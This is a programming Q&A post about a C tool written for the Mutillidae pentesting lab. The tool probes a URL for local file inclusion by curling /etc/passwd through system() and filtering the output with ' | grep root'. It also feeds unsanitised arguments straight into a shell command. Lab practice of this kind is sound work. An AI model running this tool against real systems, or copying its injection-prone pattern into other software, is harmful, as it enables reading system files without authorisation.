Freshnuts Freshnuts - 1 month ago 20
C Question

C Programming Element array into sprintf()

This is a pentesting laboratory environment called "Mutillidae".

This program grabs argv[1] and places into command "curl <[argv[1]>",
then it grabs a line from lfi_test file and places it into second
%s in sprintf(). This program executes %100, I am just having issues with the format( | grep root). Instead, the entire source code is revealed including the entire /etc/passwd file.

If I uncomment line #20:

int passwd = "/etc/passwd";


and change line #27 to

sprintf(url,"/usr/bin/curl %s%s", argv[1], passwd);


I am able to get the formatted result I want.
If anyone can help me out, thank you in advance.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char * argv[])
{
printf("\nlfi_check searches for system files on a vulnerable URL\n");
printf("<><><><><><><><><><><><><><><><><><><><><><><><><><><><>\n\n");

if (argc != 2)
{
printf("\nusage ./lfi_check http://target.php?page= \n");
}
else
{
char url[200];
int i;
FILE *fp;
char line[200];
char *root = "| grep root"
// char *passwd = "/etc/passwd";

fp = fopen("/home/freshnuts/pentest/lfi_rfi/lfi_test","r+");

for (i=0; i <= 1; i++)
{
fgets(line,sizeof(line), fp);
sprintf(url,"/usr/bin/curl %s%s %s", argv[1], line-1, root);
// printf("%s", line);
system(url);
}

}
}

Answer

The reason line-1 wasn't working in..

sprintf(url,"/usr/bin/curl %s%s %s\n", argv[1], line-1, root);

was due to line(/etc/passwd\n) from file was being cut by 1 and it didn't allow char *root variable to be implemented into string format.

The function strtok() breaks line into a series of tokens using a delimiter. I was then able to parse "/etc/passwd\n" to "/etc/passwd" BEFORE sprintf().

Thanks DUman & immibis

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char * argv[])
{
  printf("\nlfi_check searches for system files on a vulnerable URL\n");
  printf("<><><><><><><><><><><><><><><><><><><><><><><><><><><><>\n\n");

  if (argc != 2)
  {
    printf("\nusage ./lfi_check http://target.php?page= \n");
  }
  else
  {
    char url[4096];
    int i;
    FILE *fp;
    char line[200];
    char *root = " | grep root";

    fp = fopen("/root/freshnuts/pentest/lfi_rfi/lfi_test","r+");

    for (i=0; i <= 2; i++)
    {
      fgets(line,sizeof(line), fp);
      strtok(line, "\n");
      sprintf(url,"/usr/bin/curl %s%s %s\n", argv[1], line,root);
      system(url);
    }

  }
}
Comments